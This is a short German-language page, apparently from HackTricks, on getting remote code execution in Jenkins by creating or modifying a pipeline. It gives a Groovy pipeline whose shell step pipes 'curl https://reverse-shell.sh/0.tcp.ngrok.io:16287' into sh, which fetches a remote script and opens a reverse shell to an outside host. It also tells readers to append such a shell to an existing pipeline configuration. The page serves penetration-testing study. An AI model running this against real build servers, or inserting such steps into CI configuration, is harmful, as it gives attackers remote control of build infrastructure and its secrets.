Jenkins RCE Erstellen/Ändern von Pipelines

Reading time: 2 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Erstellen einer neuen Pipeline

Wählen Sie in "Neues Element" (erreichbar unter /view/all/newJob) Pipeline:

Schreiben Sie im Pipeline-Bereich die Reverse Shell:

groovy
pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Klicken Sie schließlich auf Speichern und Jetzt bauen, und die Pipeline wird ausgeführt:

Eine Pipeline ändern

Wenn Sie auf die Konfigurationsdatei einer konfigurierten Pipeline zugreifen können, könnten Sie sie einfach ändern, indem Sie Ihre Reverse-Shell anhängen und sie dann ausführen oder warten, bis sie ausgeführt wird.

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks